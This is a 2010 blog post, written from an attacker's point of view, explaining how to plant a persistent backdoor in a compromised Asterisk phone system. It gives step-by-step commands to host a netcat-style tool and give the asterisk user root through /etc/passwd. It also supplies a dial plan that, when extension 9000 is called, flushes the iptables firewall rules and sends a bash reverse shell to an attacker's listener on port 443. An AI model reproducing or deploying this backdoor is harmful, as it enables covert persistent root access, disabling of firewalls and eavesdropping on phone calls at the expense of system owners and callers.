Posted on Wednesday, 9th June 2010 by Michael

Can you pop me now?

Like most programs Asterisks offers the ability to launch system commands from with inside the application. This means it is possible for either a developer or a malicious person to execute system commands by simply editing the dial plan and making a phone call.

This is nothing new the ability to execute system commands from within an Asterisk based PBX has been around since it was first developed. A quick Google on the topic of “Asterisk system command” shows me that it has at least been documented since 2007 according to the article found here:

This article goes into great detail explaining how to set this up. The article also points out how this is insecure and provides a few additional dial plans that can be used to help thwart this command from being abused.

My article is going to look at this from the malicious standpoint and how to create a true phone home.

So you have just popped a Linux box and noticed that is running Asterisk besides the normal mischief you can cause such as racking up long distance calls and recording conversations. Let’s make sure you can get back in any time you want by simply making a call.

Via Command line:

Step 1: Download and compile a copy of snetcat ( ) locally. This is a secure free replacement to netcat (the good version that gave you the –e flag). This tool can be statically compiled and will work on any Linux based system. Once you do this you can host this file somewhere that you can easily access it later.

Step 2: Decide if you want to have root access via Asterisk. If so a simple trick would be to edit the /etc/passwd file and change your group and user number to 0:0 and save the file. Now the asterisk user will have the same level as root.

This is not needed to have fun with just the phone system.

Step 3: Depending on the system they are using for their PBX ie. PBX in a Flash, Trixbox or just straight asterisks will determine what file you need to edit to put your custom dial plan. In any system that uses FreePBX (PBX in a Flash, Trixbox and several others) any changes to the extensions.conf file will be overwritten and restored back to default by FreePBX so editing that file will not work. If the system is running FreePBX you will need to edit the extensions_custom.conf located in the /etc/asterisk/ directory.

Use your favorite editor to open the file and edit it. At the bottom of the file you will want to place the following dial plan:

[custom-backdoor] ; change name of course

exten => 9000,1,Playback(owned) ; not needed but cool when you place the call

exten => 9000,2,Wait(1)

exten => 9000,3,System(/sbin/iptables -F) ; flush iptables rules if there are any

exten =>9000,4,System(/var/tmp/.hidden/spipe –e /bin/bash 443) ; shovel shell back

exten => 9000,5,Goto(custom-backdoor,s,1)

exten => 9000,6,Hangup

Tips: Use a common port for your reverse shell to help defeat firewalls and proxies. The number 9000 is the extension you will use. Make sure it is something that is not already used. On the attacker side you will want to have a spipe connection listening for the reverse shell “./spipe –l 443”

Save this file and issue the command “asterisk -rx reload”

Step 4: At this point you system is now back doored and you should be able to call the extension and launch the reverse shell. This is useful for systems that use IVR’s that allows you to dial any extension. Or if you have found a week extension that you can register a soft phone with.

Stay tuned for more articles on this subject.

If you have any questions or concerns please feel free to contact me.< ><-->

Posted in Papers | Comments (0)

Leave a Reply